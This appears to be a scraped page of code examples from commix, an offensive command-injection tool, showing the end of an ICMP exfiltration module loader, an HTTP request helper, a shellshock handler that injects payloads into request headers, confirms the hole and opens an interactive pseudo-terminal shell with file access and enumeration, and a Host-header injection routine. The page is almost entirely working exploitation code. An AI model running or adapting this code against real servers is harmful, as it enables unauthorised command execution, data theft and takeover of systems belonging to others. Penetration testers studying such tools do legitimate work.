            print("\n" + settings.print_critical_msg(str(http_err) + "."))
            if checks.continue_tests(http_err) == True:
                settings.IGNORE_ERR_MSG = True
            else:
                os._exit(0)

    if settings.TARGET_OS != "win":
        technique = "ICMP exfiltration module"
        sys.stdout.write(
            settings.print_info_msg("Loading the " + technique + ". \n"))
        sys.stdout.flush()

        ip_data = menu.options.ip_icmp_data
        # Source address: the greedy group runs up to the last comma.
        ip_src = ''.join(re.findall(r"ip_src=(.*),", ip_data))
        # Destination address: everything after "ip_dst=" on the line.
        ip_dst = ''.join(re.findall(r"ip_dst=(.*)", ip_data))

        exploitation(ip_dst, ip_src, url, http_request_method, vuln_parameter,
                     technique)
    else:
        unsupported_msg = ("This module's payloads are not suppoted by "
                           "the identified target operating system.")
        print(settings.print_critical_msg(unsupported_msg) + "\n")
        os._exit(0)
コード例 #30
ファイル: requests.py プロジェクト: Mrfnfn/commix
def get_request_response(request):
  """Send ``request`` over the configured transport and return the outcome.

  When ``settings.REVERSE_TCP`` and ``settings.BIND_TCP`` both equal
  ``False``, the request is passed to ``headers.check_http_traffic`` and then
  sent through the HTTP proxy, through Tor, or directly with ``urlopen``.
  Otherwise the value of ``headers.check_http_traffic(request)`` is returned.

  Returns the response object, or ``False`` after an HTTP error that the run
  survives. Raises ``SystemExit`` on a URL error, or when
  ``checks.continue_tests`` does not return ``True`` after an HTTP error.
  """
  if settings.REVERSE_TCP != False or settings.BIND_TCP != False:
    return headers.check_http_traffic(request)

  def _print_spacing():
    # Blank lines ahead of a critical message, driven by verbosity and state.
    if (not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False) or \
       (settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None):
      print("")
    if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
      print("")

  def _continue_or_exit(http_err):
    # Ask whether to carry on; a "yes" silences later HTTP error reports.
    if checks.continue_tests(http_err) == True:
      settings.IGNORE_ERR_MSG = True
    else:
      raise SystemExit()

  def _report_http_error(http_err):
    # Shared by the proxy and Tor paths; the internal-server-error status
    # is skipped silently.
    if str(http_err.code) != settings.INTERNAL_SERVER_ERROR and \
       settings.IGNORE_ERR_MSG == False:
      err = str(http_err) + "."
      _print_spacing()
      print(settings.print_critical_msg(err))
      _continue_or_exit(http_err)

  def _abort_on_url_error(url_err):
    # Shared by the Tor and direct paths: print the reason text from its
    # third word onwards, then stop.
    reason = ' '.join(str(url_err.reason).split(" ")[2:]) + "."
    if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
      print("")
    print(settings.print_critical_msg(reason))
    raise SystemExit()

  headers.check_http_traffic(request)

  if menu.options.proxy:
    # An HTTP proxy is configured.
    try:
      response = proxy.use_proxy(request)
    except _urllib.error.HTTPError as http_err:
      _report_http_error(http_err)
      response = False
    except _urllib.error.URLError as url_err:
      # NOTE(review): the membership test assumes url_err.reason is a
      # string -- confirm what the proxy path raises.
      if "Connection refused" in url_err.reason:
        notice = ("The target host is not responding. "
                  "Please ensure that is up and try again.")
        _print_spacing()
        print(settings.print_critical_msg(notice))
      raise SystemExit()

  elif menu.options.tor:
    # Tor is configured.
    try:
      response = tor.use_tor(request)
    except _urllib.error.HTTPError as http_err:
      _report_http_error(http_err)
      response = False
    except _urllib.error.URLError as url_err:
      _abort_on_url_error(url_err)

  else:
    # Direct connection.
    try:
      response = _urllib.request.urlopen(request)
    except _urllib.error.HTTPError as http_err:
      if str(http_err.code) != settings.INTERNAL_SERVER_ERROR and \
         settings.IGNORE_ERR_MSG == False:
        # A status equal to menu.options.ignore_code is not printed, but
        # the continue prompt below still runs.
        if str(http_err.code) != str(menu.options.ignore_code):
          err = str(http_err) + "."
          if settings.VERBOSITY_LEVEL < 2:
            print("\r" + settings.print_critical_msg(err) + 30 * " ")
        _continue_or_exit(http_err)
      response = False
    except _urllib.error.URLError as url_err:
      _abort_on_url_error(url_err)

  return response
コード例 #31
ファイル: shellshock.py プロジェクト: security-geeks/commix
def shellshock_handler(url, http_request_method, filename):
  """Run the shellshock test against ``url`` and drive the follow-up menus.

  For every entry of ``shellshock_cves`` and every header name in ``headers``
  a payload is built with ``shellshock_payloads(cve, "echo <cve>:Done;")``,
  sent as the value of that request header, and the response headers and
  body are searched for the ``cve`` string. Because the test string travels
  in a request header value, it is visible to server-side logging that
  records header values.

  On a match the run switches to the exploitation phase, the finding is
  recorded through the ``logs`` helpers (``filename`` is passed to them),
  and the enumeration, file-access, single-command and pseudo-terminal
  steps follow, each prompting unless ``menu.options.batch`` is set.

  Returns ``True``/``False`` (the negation of ``no_result``) only when the
  pseudo-terminal prompt is declined and ``checks.next_attack_vector`` does
  not return ``True``; every other path ends without an explicit return.
  Raises ``SystemExit`` on a quit answer, after ``menu.options.os_cmd`` has
  run, or when the operator declines to continue after an HTTP error.

  Python 2 only: uses print statements, ``raw_input`` and the
  ``except Type, name`` form.
  """

  counter = 1
  vp_flag = True
  no_result = True
  export_injection_info = False

  injection_type = "results-based command injection"
  technique = "shellshock injection technique"

  info_msg = "Testing the " + technique + "... "
  if settings.VERBOSITY_LEVEL > 1:
    info_msg = info_msg + "\n"
  sys.stdout.write(settings.print_info_msg(info_msg))
  sys.stdout.flush()

  try: 
    # i counts combinations tried; total is the size of the cve x header grid.
    i = 0
    total = len(shellshock_cves) * len(headers)
    for cve in shellshock_cves:
      for check_header in headers:
        # Check injection state
        settings.DETECTION_PHASE = True
        settings.EXPLOITATION_PHASE = False
        i = i + 1
        # The cve string doubles as the marker searched for in the response.
        attack_vector = "echo " + cve + ":Done;"
        payload = shellshock_payloads(cve, attack_vector)

        # Check if defined "--verbose" option.
        if settings.VERBOSITY_LEVEL == 1:
          sys.stdout.write("\n" + settings.print_payload(payload))
        elif settings.VERBOSITY_LEVEL > 1:
          info_msg = "Generating a payload for injection..."
          print settings.print_info_msg(info_msg)
          print settings.print_payload(payload)

        # The payload is the value of the single header under test.
        header = {check_header : payload}
        request = urllib2.Request(url, None, header)
        # Keep menu.options.agent in step with what is actually being sent.
        if check_header == "User-Agent":
          menu.options.agent = payload
        else:
          menu.options.agent = default_user_agent  
        log_http_headers.do_check(request)
        log_http_headers.check_http_traffic(request)
        # Check if defined any HTTP Proxy.
        if menu.options.proxy:
          response = proxy.use_proxy(request)
        # Check if defined Tor.
        elif menu.options.tor:
          response = tor.use_tor(request)
        else:
          response = urllib2.urlopen(request)
        # Progress figures; percent is reassigned by every branch below.
        percent = ((i*100)/total)
        float_percent = "{0:.1f}".format(round(((i*100)/(total*1.0)),2))
        
        # Last combination: the label becomes the final verdict and the
        # response is not inspected in this branch.
        if str(float_percent) == "100.0":
          if no_result == True:
            percent = Fore.RED + "FAILED" + Style.RESET_ALL
          else:
            percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
            no_result = False

        # Marker found among the response headers.
        elif len(response.info()) > 0 and cve in response.info():
          percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
          no_result = False

        # Otherwise look for the marker in the response body.
        elif len(response.read()) > 0 and cve in response.read():
          percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
          no_result = False

        else:
          percent = str(float_percent )+ "%"

        # In quiet mode the progress line is redrawn in place with "\r".
        if not settings.VERBOSITY_LEVEL >= 1:
          info_msg = "Testing the " + technique + "... " +  "[ " + percent + " ]"
          sys.stdout.write("\r" + settings.print_info_msg(info_msg))
          sys.stdout.flush()

        if no_result == False:
          # Check injection state
          settings.DETECTION_PHASE = False
          settings.EXPLOITATION_PHASE = True
          # Print the findings to log file.
          if export_injection_info == False:
            export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique)
          
          vuln_parameter = "HTTP Header"
          the_type = " " + vuln_parameter
          # A leading space is added for the log entry and stripped again
          # right after the call.
          check_header = " " + check_header
          vp_flag = logs.add_parameter(vp_flag, filename, the_type, check_header, http_request_method, vuln_parameter, payload)
          check_header = check_header[1:]
          logs.update_payload(filename, counter, payload) 

          if settings.VERBOSITY_LEVEL >= 1:
            checks.total_of_requests()

          success_msg = "The (" + check_header + ") '"
          success_msg += url + Style.RESET_ALL + Style.BRIGHT 
          success_msg += "' seems vulnerable via " + technique + "."
          if settings.VERBOSITY_LEVEL <= 1:
            print ""
          print settings.print_success_msg(success_msg)
          print settings.SUB_CONTENT_SIGN + "Payload: " + "\"" + payload + "\"" + Style.RESET_ALL

          # Enumeration options.
          # If enumeration already ran, ask before repeating it; batch mode
          # and an empty answer both count as "y".
          if settings.ENUMERATION_DONE == True :
            if settings.VERBOSITY_LEVEL >= 1:
              print ""
            while True:
              if not menu.options.batch:
                question_msg = "Do you want to enumerate again? [Y/n] > "
                sys.stdout.write(settings.print_question_msg(question_msg))
                enumerate_again = sys.stdin.readline().replace("\n","").lower()
              else:
                 enumerate_again = "" 
              if len(enumerate_again) == 0:
                 enumerate_again = "y"
              if enumerate_again in settings.CHOICE_YES:
                enumeration(url, cve, check_header, filename)
                break
              elif enumerate_again in settings.CHOICE_NO: 
                break
              elif enumerate_again in settings.CHOICE_QUIT:
                raise SystemExit()
              else:
                # Unrecognised answer: report it and ask again.
                err_msg = "'" + enumerate_again + "' is not a valid answer."  
                print settings.print_error_msg(err_msg)
                pass
          else:
            enumeration(url, cve, check_header, filename)

          # File access options.
          # Same prompt pattern as the enumeration step above.
          if settings.FILE_ACCESS_DONE == True :
            while True:
              if not menu.options.batch:
                question_msg = "Do you want to access files again? [Y/n] > "
                sys.stdout.write(settings.print_question_msg(question_msg))
                file_access_again = sys.stdin.readline().replace("\n","").lower()
              else:
                 file_access_again= "" 
              if len(file_access_again) == 0:
                 file_access_again = "y"
              if file_access_again in settings.CHOICE_YES:
                file_access(url, cve, check_header, filename)
                break
              elif file_access_again in settings.CHOICE_NO: 
                break
              elif file_access_again in settings.CHOICE_QUIT:
                raise SystemExit()
              else:
                # Unrecognised answer: report it and ask again.
                err_msg = "'" + file_access_again  + "' is not a valid answer."  
                print settings.print_error_msg(err_msg)
                pass
          else:
            file_access(url, cve, check_header, filename)

          # A command supplied in menu.options.os_cmd is run once, its
          # output printed, and the program then exits.
          if menu.options.os_cmd:
            cmd = menu.options.os_cmd 
            shell, payload = cmd_exec(url, cmd, cve, check_header, filename)
            print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL 
            raise SystemExit()

          else:
            # Pseudo-Terminal shell
            print ""
            go_back = False
            go_back_again = False
            # Outer loop: the yes/no/quit prompt. It ends after one pass
            # unless the answer was invalid (see the trailing break).
            while True:
              if go_back == True:
                break
              if not menu.options.batch:
                question_msg = "Do you want a Pseudo-Terminal shell? [Y/n] > "
                sys.stdout.write(settings.print_question_msg(question_msg))
                gotshell = sys.stdin.readline().replace("\n","").lower()
              else:
                gotshell= ""  
              if len(gotshell) == 0:
                 gotshell= "y"
              if gotshell in settings.CHOICE_YES:
                if not menu.options.batch:
                  print ""
                print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)"
                if readline_error:
                  checks.no_readline_module()
                # Inner loop: read one command per pass until an option
                # sets go_back or an exception ends the session.
                while True:
                  try:
                    if not readline_error:
                      # Tab completer
                      readline.set_completer(menu.tab_completer)
                      # macOS tab completer (readline backed by libedit)
                      if getattr(readline, '__doc__', '') is not None and 'libedit' in getattr(readline, '__doc__', ''):
                        readline.parse_and_bind("bind ^I rl_complete")
                      # Unix tab completer
                      else:
                        readline.parse_and_bind("tab: complete")
                    cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """)
                    cmd = checks.escaped_cmd(cmd)
                    
                    # Built-in shell options are dispatched separately from
                    # commands sent to the target.
                    if cmd.lower() in settings.SHELL_OPTIONS:
                      os_shell_option = checks.check_os_shell_options(cmd.lower(), technique, go_back, no_result) 
                      go_back, go_back_again = check_options(url, cmd, cve, check_header, filename, os_shell_option, http_request_method, go_back, go_back_again)

                      if go_back:
                        break
                    else: 
                      shell, payload = cmd_exec(url, cmd, cve, check_header, filename)
                      if shell != "":
                        # Update logs with executed cmds and execution results.
                        logs.executed_command(filename, cmd, shell)
                        print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n"
                      else:
                        # Empty output: show the payload at verbosity 1 and
                        # above, then report that nothing came back.
                        info_msg = "Executing the '" + cmd + "' command... "
                        if settings.VERBOSITY_LEVEL == 1:
                          sys.stdout.write(settings.print_info_msg(info_msg))
                          sys.stdout.flush()
                          sys.stdout.write("\n" + settings.print_payload(payload)+ "\n")

                        elif settings.VERBOSITY_LEVEL > 1:
                          sys.stdout.write(settings.print_info_msg(info_msg))
                          sys.stdout.flush()
                          sys.stdout.write("\n" + settings.print_payload(payload)+ "\n")
                        err_msg = "The '" + cmd + "' command, does not return any output."
                        print settings.print_critical_msg(err_msg) + "\n"

                  # Interrupts and exits propagate to the caller unchanged.
                  except KeyboardInterrupt:
                    raise

                  except SystemExit:
                    raise

                  except EOFError:
                    err_msg = "Exiting, due to EOFError."
                    print settings.print_error_msg(err_msg)
                    raise

                  # Any other exception is swallowed: the "Testing ..."
                  # banner is reprinted and the inner loop ends.
                  except:
                    info_msg = "Testing the " + technique + "... "
                    if settings.VERBOSITY_LEVEL > 1:
                      info_msg = info_msg + "\n"
                    sys.stdout.write(settings.print_info_msg(info_msg))
                    sys.stdout.flush()
                    break
                    
              elif gotshell in settings.CHOICE_NO:
                # Declined: move on to the next combination, or return the
                # overall result to the caller.
                if checks.next_attack_vector(technique, go_back) == True:
                  break
                else:
                  if no_result == True:
                    return False 
                  else:
                    return True 

              elif gotshell in settings.CHOICE_QUIT:
                raise SystemExit()

              else:
                err_msg = "'" + gotshell + "' is not a valid answer."  
                print settings.print_error_msg(err_msg)
                continue
              break
        else:
          # No match yet: try the next header / cve combination.
          continue
          
    if no_result and settings.VERBOSITY_LEVEL < 2:
      print ""

  # HTTP errors raised anywhere above: the internal-server-error status is
  # skipped silently, other codes prompt whether to continue.
  except urllib2.HTTPError, err_msg:
    if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR:
      response = False  
    elif settings.IGNORE_ERR_MSG == False:
      err = str(err_msg) + "."
      print "\n" + settings.print_critical_msg(err)
      continue_tests = checks.continue_tests(err_msg)
      if continue_tests == True:
        settings.IGNORE_ERR_MSG = True
      else:
        raise SystemExit()
コード例 #32
def host_injection(url, vuln_parameter, payload):
  
  payload = urlparse(url).netloc + payload

  def inject_host(url, vuln_parameter, payload, proxy):

    if proxy == None:
      opener = urllib2.build_opener()
    else:
      opener = urllib2.build_opener(proxy)

    # Check if defined POST data
    if menu.options.data:
      menu.options.data = settings.USER_DEFINED_POST_DATA
      request = urllib2.Request(url, menu.options.data)
    else:
      url = parameters.get_url_part(url)
      request = urllib2.Request(url)
    #Check if defined extra headers.
    headers.do_check(request)
    payload = checks.newline_fixation(payload)  
    request.add_header('Host', payload)
    try:
      headers.check_http_traffic(request)
      response = opener.open(request)
      return response
    except ValueError:
      pass

  if settings.TIME_RELATIVE_ATTACK :
    start = 0
    end = 0
    start = time.time()

  proxy = None 
  #response = inject_host(url, vuln_parameter, payload, proxy)
  # Check if defined any HTTP Proxy.
  if menu.options.proxy:
    try:
      proxy = urllib2.ProxyHandler({settings.SCHEME : menu.options.proxy})
      response = inject_host(url, vuln_parameter, payload, proxy)
    except urllib2.HTTPError, err_msg:
      if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR:
        response = False  
      elif settings.IGNORE_ERR_MSG == False:
        err = str(err_msg) + "."
        if not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False or \
          settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None:
          print("")
        if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
          print("") 
        print(settings.print_critical_msg(err))
        continue_tests = checks.continue_tests(err_msg)
        if continue_tests == True:
          settings.IGNORE_ERR_MSG = True
        else:
          raise SystemExit()
      response = False 
    except urllib2.URLError, err_msg:
      err_msg = str(err_msg.reason).split(" ")[2:]
      err_msg = ' '.join(err_msg)+ "."
      if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
        print("")
      print(settings.print_critical_msg(err_msg))
      raise SystemExit()